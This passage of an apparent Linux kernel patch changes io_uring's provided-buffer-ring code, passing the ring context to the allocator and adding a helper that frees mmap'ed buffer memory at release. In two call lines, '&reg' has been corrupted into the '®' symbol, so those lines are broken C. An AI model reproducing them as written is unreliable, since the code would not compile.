if (!(reg.flags & IOU_PBUF_RING_MMAP))
ret = io_pin_pbuf_ring(®, bl);
else
- ret = io_alloc_pbuf_ring(®, bl);
+ ret = io_alloc_pbuf_ring(ctx, ®, bl);
if (!ret) {
bl->nr_entries = reg.ring_entries;
@@ -649,3 +667,19 @@ void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)
return bl->buf_ring;
}
+
+/*
+ * Called at or after ->release(), free the mmap'ed buffers that we used
+ * for memory mapped provided buffer rings.
+ */
+void io_kbuf_mmap_list_free(struct io_ring_ctx *ctx)
+{
+ struct io_buf_free *ibf;
+ struct hlist_node *tmp;
+
+ hlist_for_each_entry_safe(ibf, tmp, &ctx->io_buf_list, list) {
+ hlist_del(&ibf->list);
+ io_mem_free(ibf->mem);
+ kfree(ibf);
+ }
+}
diff --git a/io_uring/kbuf.h b/io_uring/kbuf.h
index f2d615236b2cb9..6c7646e6057cf5 100644
--- a/io_uring/kbuf.h
+++ b/io_uring/kbuf.h
@@ -51,6 +51,8 @@ int io_provide_buffers(struct io_kiocb *req, unsigned int issue_flags);
int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg);
int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg);
+void io_kbuf_mmap_list_free(struct io_ring_ctx *ctx);
+
unsigned int __io_put_kbuf(struct io_kiocb *req, unsigned issue_flags);
bool io_kbuf_recycle_legacy(struct io_kiocb *req, unsigned issue_flags);